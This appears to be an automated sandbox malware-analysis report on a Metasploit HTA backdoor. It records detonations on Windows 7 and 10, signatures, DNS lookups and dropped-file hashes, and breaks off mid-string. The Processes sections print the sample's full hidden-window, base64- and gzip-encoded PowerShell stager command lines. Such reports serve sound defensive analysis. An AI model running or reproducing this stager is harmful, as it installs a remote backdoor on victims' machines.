Malware Analysis Report

2024-09-23 04:01

Sample ID 240531-lq722adg6y
Target 14cff907c52f3c8efc51e1775fca708be95910b3488107d5be4e0b2cd5bcaaa3.hta
SHA256 14cff907c52f3c8efc51e1775fca708be95910b3488107d5be4e0b2cd5bcaaa3
Tags
metasploit backdoor execution trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

14cff907c52f3c8efc51e1775fca708be95910b3488107d5be4e0b2cd5bcaaa3

Threat Level: Known bad

The file 14cff907c52f3c8efc51e1775fca708be95910b3488107d5be4e0b2cd5bcaaa3.hta was found to be: Known bad.

Malicious Activity Summary

metasploit backdoor execution trojan

MetaSploit

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-31 09:45

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-31 09:45

Reported

2024-05-31 09:47

Platform

win10v2004-20240426-en

Max time kernel

148s

Max time network

151s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\14cff907c52f3c8efc51e1775fca708be95910b3488107d5be4e0b2cd5bcaaa3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

MetaSploit

trojan backdoor metasploit

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\14cff907c52f3c8efc51e1775fca708be95910b3488107d5be4e0b2cd5bcaaa3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARgBrADMAMQAyAFUAQwBBADcAVgBXAGEAMgAvAGEAUwBCAHsAMAB9ADkAWABxAG4ALwB3AGEAcQBRACcAJwArACcAJwBiAEsAcwBFADgAMgByAGEAUgBLAHEAMABOAG8AYQBZAGwARgBkAGkAcwBIAGsAVQByAFEAWgA3AE0AQgBQAEcASABtAEsAUABBADIAeQAzAC8AMwAzAHYAZwBKADMAUQBiAGIASwBiAFgAYQBrAGoASQBjAFkAegA5AHoAVgBuAHoAcgAxADMAbABtAG4AawBjAGMASQBpAEsAWgB4AEsAMwA5AHsAMQB9ACsAawBiAEkAeABRAEQARQBLAEoAYQBVAFEAawBhAEEAbwBGAHsAMAB9AHkATABmAFcAaQBxAHsAMAB9ADcAcwBGAGgAcQBlAEwAawBmAFIAWgBVAG0AYgB7ADEAfQBaAG0ATwB5AEUASgBGAG8AZgBuAG4AWgBTAE8ATQBZAFIALwB6ADQAWABiAHIAQwBYAEUAOABTAEgAQwA0AG8AdwBZAG0AaQBTAG4AOQBLADcAZwByAEgAKwBLAHkALwB1AE0ATQBlAGwANwA1AEoAaABkADkATABWADUAUQB0AEUATQAzAEUAOQBnADMAawByAGIAQgAwAHAAawBlACsAMgBPAHMAdwBEADQAbgBJAFMAdgBhAEcARQBxADcASQBYADcALwBLAHsAMQB9AHUAeQBzAE0AaQA4ADEANwAxAE4ARQBFADAAVwAyADkAdwBuAEgAWQBjAG0AbgBWAEYAYQBsADcAewAxAH0AcAB3AE8ATgB4AHYAcwBDAEoAMwBpAFIAZQB6AGgAQwAxADUAeQBTAFYAUgByAFYAbwBhAFIAUQBsAGEANABoADUAWQBlADgAQgBkAHoARgBmAE0AewAwAH0AMgBRADQAegBkAE4ANQBZAHMAegB7ADAAfQBPAE0AcQBPACcAJwArACcAJwBKAGUAdwBjAHAAUgBRAFoAcABvAE8AWQBlAGIAcgB2AHgAegBoAEoANQBLAEkAMABFAHgANQBtADgALwBsAHYAeQBpAHgAegBmADUAdABHAG4ASQBTADQAMQBJADQANABqAHQAbgBHAHgAdgBFACcAJwArACcAJwBEADgAWABCAFMAcwBsAEQAawBVADMAeQBMAGwAMwBQAFEAcwBuAGwATQBvAG0AQwB1AHEAaQBEADIAdwBOAFkAWQBnAEUAMABwAEwAVQByAC8AeABZAHoAUwB3ADkAcwBjAHYATgBjAHEASwBhAGQASwBJAEQAWABnAHMAVgBxAEUAYQAzADMAdQBvAEYAMwBtAHAAeABRAGYAVgBlAFYAbgBJAGgAVgBjAFUARwBFADgAOABnAEUAZwAvAEMANQBRAFgATwBZAFUAOABuAEQANwBHAFEANAA5AEwAZQBSAGoAZAB0AGoAQgBFAEwATQB5AFkAQQBrADUAewAxAH0ASAB7ADEAfQBXAHkAawBXAHAAQwA4ADQAUgBaAC8ARQBlAFAAZwB2AEQATwBNAFgAcQAvAEIARgB4AHEAYgBCAHYARgAxADkAcgBxADUASQByAGcAdABwAEQAOQBlAGIAVwBoAGIAVwBaAHcANABnAC8AZgA3AEwAdwBBAHcATQBLAGkAMAArACcAJwArACcAJwA0AEoANABSAGUANQByAE8ASgBsAHkAewAwAH0AQwA1AGoANQBDAEkAZgBGAHkAeQBpAHIAUAAzAFEAJwAnACsAJwAnAHAAZQBVAG4AeABBAHAASgBTAEwAOQBTAEIARQBSAGMANAAyAHMARwA5AGkAaQBnAFAARQBCAGMAeQBDAEgARAArAHAATgBVAFAAQwBIADMAVwBOAGwARgBBAGYAeAA3AG8ASABOADUAdABBAFYASABEAHAAewAxAH0AbwAvAEIASABHADkATwBrAGQAdABSAEYANABlAEEAMwB2AEUAYgAyAEYAcABZAFEAcQBMAGcAWABEAHAATABqAG4AMwB1AFgAWAB5AEQAawBOAHkAZwBLAEUAbQBLADAAaQBDAEYAewAwAH0AUABXAEsAawBvADAAUgB4AFgANQBSADAAcQBPAEUAWgBGAHQAewAxAH0AeQB0AGwAaABLAGoAKwBGADIAMAAwAHAASgB4ADUASwBlAEcANQB1AHIAdgA0AE4AegBzAHgAdABnADAAVQBKAGoAMQBNAFAANwBoAFUAZwBHAE4AbwBiADcAQgBGAEUAQgBTAEoARgB5AFMASQArAE4AdgBhADIASwBEAEoASAA5AC8ASwB6AGUARABRAFEAcABaAEEALwBZAE8AawBCADcAZwBOAFcAQgBBADQAMgBGACcAJwArACcAJwAyAHkAJwAnACsAJwAnAEoASQBWAEoAZwBoAGwAcQB5AE0AVwArAEgARwA0AHAARABrAEQAagBVAGoAJwAnACsAJwAnAFIAWgBGAEEAVgBTAEoATABFAGMATwA1AEUASQBCADkAdQBVAFgAdwBzAHcAegAnACcAKwAnACcANABVAGgANwBnAFUAcwBPAHkARQBtAFEAYwBOAGsAMgBaAGIAdwBvAE8AUwB7ADAAfQBtAFUASQBVAEUAeABnAGQAKwAvAFkAOABnAGYAaQA0AC8AaAAyAGcAYQBNAGMANwB1AFIAcwBrAHsAMAB9AGIARwBiAHMAdQBVAGkAQgBnAGoAOQBvAEMAWQA1AG0AQQBCACcAJwArACcAJwAzAGcAaQBEAGwAQQAwAFkAcABaAGEASwBBAEUAbgA5AGUAUABoAFUAWgA1AHAALwBYAEoAUQBJAGMAeABNAFMAMgBiAFkARwBkAE4ASwB1ADAAdAAvAEwAcgB3AEcANQBrAGYALwBTAC8AWABqAE8AKwAvAG0ASgBiAFcAOQBSAHIASgA0AEsAcgAxAFMAUwBmAGIAWQBPAHQAOQB7ADEAfQB1AG0AZQBmACsAMwBqAEMAOQB1AHAAYwA3AHYAWgA1AG8AMgBCAGIAdAAyAFEAcwBsAEYAZgBlAFUAWgA1AEsATwBhAFYASQBDAEQAbABZAEQATABTAHIAZQBIAEsAbwArAFYAQgBNACsAegAwADIAcwBsAE8AMgAxAHAAdQAxAHoATwBOAFAANwBiAFYAQgBKAGgAYQByADEAdgBqAHMAbAB7ADEAfQByADEAZgB1ADEAOABoAHIAUQBtADQARABlAFcAdgBkADcASQAnACcAKwAnACcAZABuAHUATwBqAEMASABpAHQAcgB2AEcATwAzAEUASwBMAGQAcAA4ADcAcAB4AHUAMwBDAHIAcgBhAGwATABMAGEAMwBlAFcAaQAxAGQAbAB0AGoAbgBFADEAUAB7ADAAfQB0AEEAcwBmAG0AZAAyADkAcgBoAHYATQByADMAWAAzADQAOABvAHQARwAxAHAAZQBhAEcAaQBhAGsAMQA3AHIAQgBoAHgAdgBzADIAdgBkADMAcQBCAEcAcQBLAE8AdABxAFYAVgBjADEAbgBFAGQAawAyAGcAdQBNADEAQgB3AHoAYwA0AEQAYgBWAGsAZgBhAEEAewAxAH0AdAAnACcAKwAnACcAQgBnADMAOQBlAG0AYwBRAFAATAAxAHYAdABxAFoAagAxAE8AMABzAGUAdABXAGwAVgBwAG0ATQBkAGIAUAB1AGYAQgBBADQATwBWAFYAUwBPAHgALwBlAGcAVQB0AG4AagBLAHgAaAAwAG4AOQB2AGEAUgBVAEgAdwA5AHgASgBoAHsAMQB9ADQAbABiAE8AdABvAFoAYgBLAG0ARQBHADUAYgBjAEcAeAA3AGEAewAxAH0AUQBYAHEAWABXAHoAOQBjAHoAeAAzAGUASQBMAGQAWQB7ADAAfQBkAHUATgAvAFMAagByAEwAQgByAGUAdQBBADMAewAxACcAJwArACcAJwB9AHEAMwBXAG0AbwBYAHIAdgBsAGUATgA5ADUAMwBKAGsAawBWAHIAUQAxADIAaQBMAHcAMQB2AGQAZQB2AFYAcABOAE4AYQAwAEIAaABmAHoAaQBxAE0AdAAyAGgAdgB7ADAAfQBIAFMATwA5AE8AOQBzAEQARQBaADEASABXAHIAYgB1AGwAZQBkADcATwBMAHgAcAB2AHQAeAA0AGMAdABSADkAYwB1AEMAbwB5AGgAZABqAEgAewAxAH0ALwBBAHsAMQB9ADQAJwAnACsAJwAnAE0AUgB1AFIAaQBOAGUAcQA4ADAASwA0AEYAdQBYAHoANwBaAHYAQwB3ADUAMgArAHsAMAB9AFUANABZADgAbABKAC8AewAxAH0ASwBJADQAVwBTAEUASwB6AEkARwAnACcAKwAnACcAewAxAH0AbgArAGQAdgBpADgAVwB0AHIASgBJAFAARwBCAEUAYQBpAGcASwBQAGcAagBXAE8ASQAwAHkAaABpADAASwBmAHoAVwBtAHYAVQA4AG8AOAAwAFUAaABFAHgAWQBjAGUAZAB1AHcAcwBvAHQARwBOADIAbwBlAFEAbgBwAHUAcAAwAHEATwAnACcAKwAnACcAZwArAHQAUgBlADgAcQBYAEwAeQB5AG0ARQBDAEcAawBFAEgAQwAnACcAKwAnACcAOQAxAGMAQgB7ADAAfQB3AFYAJwAnACsAJwAnAGIARwA4AHEANQBYAEwAMABCAGIASwB1ADMATAA5AGsARABDAHYAUAAxAGUARABiAGYAYQBLAHMARgBVAFUAZgBlAFUASQB7ADAAfQBHAGEAYwBIAG8AeQBEAFAAYgBLAFUAJwAnACsAJwAnAEYATwBWAFgAUQB3AFgAUABCAHcANQBWADcARQBXACcAJwArACcAJwB3AFgAcwBJAE4ASABLACsAaAB7ADEAfQBrAEEAUgBQAEoAWQBDAGcAWgA3AEIARwBEADMARgBMAGoALwBXAEkAeABGAE8AcwBBAFAAUQBLAG4ARAB5AG0AWABnADUAQQBFAEYAQQAvAHcAegBmAFMAdwBVAHUAbQB1AHAAcABrAHkANQA0AHcAYQA4AGsAewAwAH0ARgBiAE4AVgB2AEQAbgAvAHcAdABoAG4AdABiACsAWQBmAGQAVgBKAEMAbwBYAE0AMgBSACsAVwB2ADkAeAA0AGEAUQB7ADAAfQAvAEQASQBBAFgARQBRADQAeQBOAGwAUQBsAFMAawArAHYAaABPAGUAeABTAEgATABrAFoAUABMADkAUQBKAEkAZwBHAFUAMgB4AFAATwA1AG4ALwBLAHoASABqAHoARwBEAGwAMwBoAEwALwArAHEAZABKAEsANABDAHcAQQBBACcAJwApAC0AZgAnACcAVAAnACcALAAnACcANgAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAFk312UCA7VWa2/aSB{0}9Xqn/waqQ'+'bKsE82raRKq0NoaYlFdisHkUrQZ7MBPGHmKPA2y3/33vgJ3QbbKbXakjIcYz9zVnzr13lmnkccIiKZxK39{1}+kbIxQDEKJaUQkaAoF{0}yLfWiq{0}7sFhqeLkfRZUmb{1}ZmOyEJFofnnZSOMYR/z4XbrCXE8SHC4owYmiSn9K7grH+Ky/uMMel75Jhd9LV5QtEM3E9g3krbB0pke+2OswD4nISvaGEq7IX7/K{1}uysMi8171NEE0W29wnHYcmnVFal7{1}pwONxvsCJ3iRezhC15ySVRrVoaRQla4h5Ye8BdzFfM{0}2Q4zdN5Ysz{0}OMqO'+'JewcpRQZpoOYebrvxzhJ5KI0Ex5m8/lvyixzf5tGnIS41I44jtnGxvE'+'D8XBSslDkU3yLl3PQsnlMomCuqiD2wNYYgE0pLUr/xYzSw9scvNcqKadKIDXgsVqEa33uoF3mpxQfVeVnIhVcUGE88gEg/C5QXOYU8nD7GQ49LeRjdtjBELMyYAk5{1}H{1}WykWpC84RZ/EePgvDOMXq/BFxqbBvF19rq5IrgtpD9ebWhbWZw4g/f7LwAwMKi0+'+'4J4Re5rOJly{0}C5j5CIfFyyirP3Q'+'peUnxApJSL9SBERc42sG9iigPEBcyCHD+pNUPCH3WNlFAfx7oHN5tAVHDp{1}o/BHG9OkdtRF4eA3vEb2FpYQqLgXDpLjn3uXXyDkNygKEmK0iCF{0}PWKko0RxX5R0qOEZFt{1}ytlhKj+F200pJx5KeG5urv4Nzsxtg0UJj1MP7hUgGNob7BFEBSJFySI+Nva2KDJH9/KzeDQQpZA/YOkB7gNWBA42F'+'2y'+'JIVJghlqyMW+HG4pDkDjUj'+'RZFAVSJLEcO5EIB9uUXwswz'+'4Uh7gUsOyEmQcNk2ZbwoOS{0}mUIUExgd+/Y8gfi4/h2gaMc7uRsk{0}bGbsuUiBgj9oCY5mAB'+'3giDlA0YpZaKAEn9ePhUZ5p/XJQIcxMS2bYGdNKu0t/LrwG5kf/S/XjO+/mJbW9RrJ4Kr1SSfbYOt9{1}umef+3jC9upc7vZ5o2Bbt2QslFfeUZ5KOaVICDlYDLSreHKo+VBM+z02slO21pu1zONP7bVBJhar1vjsl{1}r1fu18hrQm4DeWvd7I'+'dnuOjCHitrvGO3EKLdp87pxu3CrralLLa3eWi1dltjnE1P{0}tAsfmd29rhvMr3X348otG1peaGiak17rBhxvs2vd3qBGqKOtqVVc1nEdk2guM1Bwzc4DbVkfaA{1}t'+'Bg39emcQPL1vtqZj1O0setWlVpmMdbPufBA4OVVSOx/egUtnjKxh0n9vaRUHw9xJh{1}4lbOtoZbKmEG5bcGx7a{1}QXqXWz9czx3eILdY{0}duN/SjrLBreuA3{1'+'}q3WmoXrvleN953JkkVrQ12iLw1vdevVpNNa0BhfziqMt2hv{0}HSO9O9sDEZ1HWrbuled7OLxpvtx4ctR9cuCoyhdjH{1}/A{1}4'+'MRuRiNeq80K4FuXz7ZvCw52+{0}U4Y8lJ/{1}KI4WSEKzIG'+'{1}n+dvi8WtrJIPGBEaigKPgjWOI0yhi0KfzWmvU8o80UhExYceduwsotGN2oeQnpup0qO'+'g+tRe8qXLyymECGkEHC'+'91cB{0}wV'+'bG8q5XL0BbKu3L9kDCvP1eDbfaKsFUUfeUI{0}GacHoyDPbKU'+'FOVXQwXPBw5V7EW'+'wXsINHK+h{1}kARPJYCgZ7BGD3FLj/WIxFOsAPQKnDymXg5AEFA/wzfSwUumuppky54wa8k{0}FbNVvDn/wthntb+YfdVJCoXM2R+Wv9x4aQ{0}/DIAXEQ4yNlQlSk+vhOexSHLkZPL9QJIgGU2xPO5n/KzHjzGDl3hL/+qdJK4CwAA')-f'T','6')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 89.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 99.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/3964-0-0x000000007089E000-0x000000007089F000-memory.dmp

memory/3964-1-0x0000000005300000-0x0000000005336000-memory.dmp

memory/3964-3-0x00000000059C0000-0x0000000005FE8000-memory.dmp

memory/3964-2-0x0000000070890000-0x0000000071040000-memory.dmp

memory/3964-4-0x0000000070890000-0x0000000071040000-memory.dmp

memory/3964-5-0x0000000005920000-0x0000000005942000-memory.dmp

memory/3964-6-0x0000000006220000-0x0000000006286000-memory.dmp

memory/3964-7-0x0000000006290000-0x00000000062F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n3eels5k.cmb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3964-17-0x0000000006330000-0x0000000006684000-memory.dmp

memory/3964-18-0x00000000068E0000-0x00000000068FE000-memory.dmp

memory/3964-19-0x0000000006920000-0x000000000696C000-memory.dmp

memory/3964-21-0x0000000006DF0000-0x0000000006E0A000-memory.dmp

memory/3964-20-0x0000000008220000-0x000000000889A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

memory/3964-25-0x0000000070890000-0x0000000071040000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e4c01b58e06c1f2722dd1eead1cb8496
SHA1 33f6c215d1d2400c3d9f9610ebc1fc0ad37e80d0
SHA256 7940336ba33516ba385b53df88b79d65499c80b7920bfa1a52e751325b32ab57
SHA512 14cbec36beb55680904482db38066287947a06d588073bd56af0e7ddbe9a23a9ccb58ecdc92a3aa74c0fb53622a9c2c46b566d075e19b3880aa16282d8d28543

memory/3772-36-0x0000000005A90000-0x0000000005A91000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-31 09:45

Reported

2024-05-31 09:47

Platform

win7-20240221-en

Max time kernel

120s

Max time network

124s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\14cff907c52f3c8efc51e1775fca708be95910b3488107d5be4e0b2cd5bcaaa3.hta"

Signatures

MetaSploit

trojan backdoor metasploit

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\14cff907c52f3c8efc51e1775fca708be95910b3488107d5be4e0b2cd5bcaaa3.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARgBrADMAMQAyAFUAQwBBADcAVgBXAGEAMgAvAGEAUwBCAHsAMAB9ADkAWABxAG4ALwB3AGEAcQBRACcAJwArACcAJwBiAEsAcwBFADgAMgByAGEAUgBLAHEAMABOAG8AYQBZAGwARgBkAGkAcwBIAGsAVQByAFEAWgA3AE0AQgBQAEcASABtAEsAUABBADIAeQAzAC8AMwAzAHYAZwBKADMAUQBiAGIASwBiAFgAYQBrAGoASQBjAFkAegA5AHoAVgBuAHoAcgAxADMAbABtAG4AawBjAGMASQBpAEsAWgB4AEsAMwA5AHsAMQB9ACsAawBiAEkAeABRAEQARQBLAEoAYQBVAFEAawBhAEEAbwBGAHsAMAB9AHkATABmAFcAaQBxAHsAMAB9ADcAcwBGAGgAcQBlAEwAawBmAFIAWgBVAG0AYgB7ADEAfQBaAG0ATwB5AEUASgBGAG8AZgBuAG4AWgBTAE8ATQBZAFIALwB6ADQAWABiAHIAQwBYAEUAOABTAEgAQwA0AG8AdwBZAG0AaQBTAG4AOQBLADcAZwByAEgAKwBLAHkALwB1AE0ATQBlAGwANwA1AEoAaABkADkATABWADUAUQB0AEUATQAzAEUAOQBnADMAawByAGIAQgAwAHAAawBlACsAMgBPAHMAdwBEADQAbgBJAFMAdgBhAEcARQBxADcASQBYADcALwBLAHsAMQB9AHUAeQBzAE0AaQA4ADEANwAxAE4ARQBFADAAVwAyADkAdwBuAEgAWQBjAG0AbgBWAEYAYQBsADcAewAxAH0AcAB3AE8ATgB4AHYAcwBDAEoAMwBpAFIAZQB6AGgAQwAxADUAeQBTAFYAUgByAFYAbwBhAFIAUQBsAGEANABoADUAWQBlADgAQgBkAHoARgBmAE0AewAwAH0AMgBRADQAegBkAE4ANQBZAHMAegB7ADAAfQBPAE0AcQBPACcAJwArACcAJwBKAGUAdwBjAHAAUgBRAFoAcABvAE8AWQBlAGIAcgB2AHgAegBoAEoANQBLAEkAMABFAHgANQBtADgALwBsAHYAeQBpAHgAegBmADUAdABHAG4ASQBTADQAMQBJADQANABqAHQAbgBHAHgAdgBFACcAJwArACcAJwBEADgAWABCAFMAcwBsAEQAawBVADMAeQBMAGwAMwBQAFEAcwBuAGwATQBvAG0AQwB1AHEAaQBEADIAdwBOAFkAWQBnAEUAMABwAEwAVQByAC8AeABZAHoAUwB3ADkAcwBjAHYATgBjAHEASwBhAGQASwBJAEQAWABnAHMAVgBxAEUAYQAzADMAdQBvAEYAMwBtAHAAeABRAGYAVgBlAFYAbgBJAGgAVgBjAFUARwBFADgAOABnAEUAZwAvAEMANQBRAFgATwBZAFUAOABuAEQANwBHAFEANAA5AEwAZQBSAGoAZAB0AGoAQgBFAEwATQB5AFkAQQBrADUAewAxAH0ASAB7ADEAfQBXAHkAawBXAHAAQwA4ADQAUgBaAC8ARQBlAFAAZwB2AEQATwBNAFgAcQAvAEIARgB4AHEAYgBCAHY